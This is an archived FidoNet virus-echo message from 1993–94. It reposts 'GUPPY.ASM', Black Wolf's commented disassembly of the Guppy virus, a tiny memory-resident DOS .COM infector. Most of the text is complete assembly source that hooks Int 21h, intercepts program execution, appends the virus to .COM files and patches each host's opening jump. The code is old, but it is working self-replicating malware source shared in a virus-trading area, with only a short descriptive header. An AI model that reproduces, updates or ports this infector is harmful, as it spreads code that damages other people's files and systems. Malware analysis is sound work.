2022-08-21 09:07:57 +00:00
|
|
|
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|
|
|
|
|
; Msg : 20 of 54
|
|
|
|
|
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
|
|
|
|
|
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|
|
|
|
|
; Subj : GUPPY.ASM
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;.RealName: Max Ivanov
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;* Kicked-up by MeteO (2:5030/136)
|
|
|
|
|
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|
|
|
|
|
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:39)
|
|
|
|
|
|
;* To : Brad Frazee
|
|
|
|
|
|
;* Subj : GUPPY.ASM
|
|
|
|
|
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
;@RFC-Path:
|
|
|
|
|
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|
|
|
|
|
;18.n283!not-for-mail
|
|
|
|
|
|
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
|
|
|
|
|
|
;***************************************************************************
|
|
|
|
|
|
;* The Guppy Virus *
|
|
|
|
|
|
;* Disassembly by Black Wolf *
|
|
|
|
|
|
;***************************************************************************
|
|
|
|
|
|
;* The Guppy virus is a relatively simple, very small, resident .COM *
|
|
|
|
|
|
;*infector. It uses the standard way for a regular program to go resident *
|
|
|
|
|
|
;*(i.e. Int 27) which makes the infected program terminate the first time *
|
|
|
|
|
|
;*run. After that, however, infected files will run perfectly. This virus*
|
|
|
|
|
|
;*uses interesting methods to restore the storage bytes, as well as a *
|
|
|
|
|
|
;*strange technique to restore control to an infected file after it has *
|
|
|
|
|
|
;*already gone memory resident. *
|
|
|
|
|
|
;* *
|
|
|
|
|
|
;*Note: The Guppy virus was originally assembled with an assembler other *
|
|
|
|
|
|
;* than Tasm, so to keep it exactly the same some commands must be *
|
|
|
|
|
|
;* entered directly as individual bytes. In these cases, the command *
|
|
|
|
|
|
;* is commented out and the bytes are found below it. *
|
|
|
|
|
|
;* *
|
|
|
|
|
|
;***************************************************************************
|
|
|
|
|
|
|
|
|
|
|
|
.model tiny
|
|
|
|
|
|
.radix 16
|
|
|
|
|
|
.code
|
|
|
|
|
|
|
|
|
|
|
|
org 100h
|
|
|
|
|
|
start:
|
|
|
|
|
|
call Get_Offset
|
|
|
|
|
|
|
|
|
|
|
|
Get_Offset:
|
|
|
|
|
|
pop si ;SI = offset of vir +
|
|
|
|
|
|
;(Get_Offset-Start)
|
|
|
|
|
|
mov ax,3521h
|
|
|
|
|
|
mov bx,ax
|
|
|
|
|
|
int 21h ;Get Int 21 Address
|
|
|
|
|
|
|
|
|
|
|
|
mov ds:[si+Int_21_Offset-103],bx ;Save old Int 21
|
|
|
|
|
|
mov ds:[si+Int_21_Segment-103],es
|
|
|
|
|
|
|
|
|
|
|
|
;mov dx,si ;Bytes vary between assemblers
|
|
|
|
|
|
db 89,0f2
|
|
|
|
|
|
|
|
|
|
|
|
;add dx,offset Int_21_Handler-104
|
|
|
|
|
|
db 83,0c2,1f
|
|
|
|
|
|
|
|
|
|
|
|
mov ah,25h
|
|
|
|
|
|
int 21h ;Set Int 21
|
|
|
|
|
|
|
|
|
|
|
|
inc dh ;Add 100h bytes to go resident
|
|
|
|
|
|
;from handler
|
|
|
|
|
|
push cs
|
|
|
|
|
|
pop es
|
|
|
|
|
|
int 27h ;Terminate & stay resident
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Int_21_Handler:
|
|
|
|
|
|
cmp ax,4B00h ;Is call a Load & Execute?
|
|
|
|
|
|
je Infect ;Yes? Jump Infect
|
|
|
|
|
|
|
|
|
|
|
|
cmp al,21h ;Might it be a residency check?
|
|
|
|
|
|
jne Go_Int_21 ;No? Restore control to Int 21
|
|
|
|
|
|
|
|
|
|
|
|
;cmp ax,bx ;Are AX and BX the same?
|
|
|
|
|
|
db 39,0d8
|
|
|
|
|
|
|
|
|
|
|
|
jne Go_Int_21 ;No, Restore control to Int 21
|
|
|
|
|
|
|
|
|
|
|
|
push word ptr [si+3dh] ;3dh = offset of Storage_Bytes -
|
|
|
|
|
|
;Get_Offset
|
|
|
|
|
|
|
|
|
|
|
|
;This gets the first word of
|
|
|
|
|
|
;storage bytes, which is then
|
|
|
|
|
|
;popped to CS:100 to restore it.
|
|
|
|
|
|
|
|
|
|
|
|
mov bx,offset ds:[100] ;100 = Beginning of COM
|
|
|
|
|
|
pop word ptr [bx]
|
|
|
|
|
|
|
|
|
|
|
|
mov cl,[si+3Fh] ;Restore third storage byte.
|
|
|
|
|
|
mov [bx+2],cl
|
|
|
|
|
|
|
|
|
|
|
|
Restore_Control:
|
|
|
|
|
|
pop cx
|
|
|
|
|
|
push bx
|
|
|
|
|
|
iret ;Jump back to Host program.
|
|
|
|
|
|
|
|
|
|
|
|
Storage_Bytes db 0, 0, 0
|
|
|
|
|
|
|
|
|
|
|
|
Infect:
|
|
|
|
|
|
push ax
|
|
|
|
|
|
push bx
|
|
|
|
|
|
push dx
|
|
|
|
|
|
push ds
|
|
|
|
|
|
mov ax,3D02h
|
|
|
|
|
|
int 21h ;Open File for Read/Write Access
|
|
|
|
|
|
|
|
|
|
|
|
xchg ax,bx
|
|
|
|
|
|
call Get_Offset_Two
|
|
|
|
|
|
|
|
|
|
|
|
Get_Offset_Two:
|
|
|
|
|
|
pop si
|
|
|
|
|
|
push cs
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
mov ah,3F
|
|
|
|
|
|
mov cx,3
|
|
|
|
|
|
sub si,10 ;Set SI=Storage_Bytes
|
|
|
|
|
|
|
|
|
|
|
|
;mov dx,si
|
|
|
|
|
|
db 89,0f2
|
|
|
|
|
|
|
|
|
|
|
|
int 21h ;Read first 3 bytes of file
|
|
|
|
|
|
|
|
|
|
|
|
cmp byte ptr [si],0E9h ;Is the first command a jump?
|
|
|
|
|
|
jne Close_File ;No? Jump to Close_File
|
|
|
|
|
|
mov ax,4202h
|
|
|
|
|
|
xor dx,dx
|
|
|
|
|
|
xor cx,cx
|
|
|
|
|
|
int 21h ;Go to end of file
|
|
|
|
|
|
|
|
|
|
|
|
xchg ax,di
|
|
|
|
|
|
mov ah,40h
|
|
|
|
|
|
mov cl,98h ;Virus Size
|
|
|
|
|
|
|
|
|
|
|
|
;mov dx,si
|
|
|
|
|
|
db 89,0f2
|
|
|
|
|
|
|
|
|
|
|
|
sub dx,40h ;Beginning of virus
|
|
|
|
|
|
int 21h ;Append virus to new host
|
|
|
|
|
|
|
|
|
|
|
|
mov ax,4200h
|
|
|
|
|
|
xor cx,cx
|
|
|
|
|
|
xor dx,dx
|
|
|
|
|
|
int 21h ;Go back to beginning of file
|
|
|
|
|
|
|
|
|
|
|
|
mov cl,3
|
|
|
|
|
|
|
|
|
|
|
|
;sub di,cx
|
|
|
|
|
|
db 29,0cf
|
|
|
|
|
|
|
|
|
|
|
|
mov [si+1],di
|
|
|
|
|
|
mov ah,40h
|
|
|
|
|
|
|
|
|
|
|
|
;mov dx,si
|
|
|
|
|
|
db 89,0f2
|
|
|
|
|
|
|
|
|
|
|
|
int 21h ;Write 3 byte jump to file
|
|
|
|
|
|
|
|
|
|
|
|
Close_File:
|
|
|
|
|
|
mov ah,3Eh
|
|
|
|
|
|
int 21h
|
|
|
|
|
|
|
|
|
|
|
|
pop ds
|
|
|
|
|
|
pop dx
|
|
|
|
|
|
pop bx
|
|
|
|
|
|
pop ax
|
|
|
|
|
|
Go_Int_21:
|
|
|
|
|
|
db 0EAh ;Go On With Int 21
|
|
|
|
|
|
Int_21_Offset dw ?
|
|
|
|
|
|
Int_21_Segment dw ?
|
|
|
|
|
|
|
|
|
|
|
|
end start
|
|
|
|
|
|
|
|
|
|
|
|
;-+- UC2 Support France
|
|
|
|
|
|
; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
|
|
|
|
|
|
;=============================================================================
|
|
|
|
|
|
;
|
|
|
|
|
|
;Yoo-hooo-oo, -!
|
|
|
|
|
|
;
|
|
|
|
|
|
;
|
|
|
|
|
|
; <20> The Me<4D>eO
|
|
|
|
|
|
;
|
|
|
|
|
|
;/d Warn if duplicate symbols in libraries
|
|
|
|
|
|
;
|
|
|
|
|
|
;--- Aidstest Null: /Kill
|
|
|
|
|
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|
|
|
|
|
|
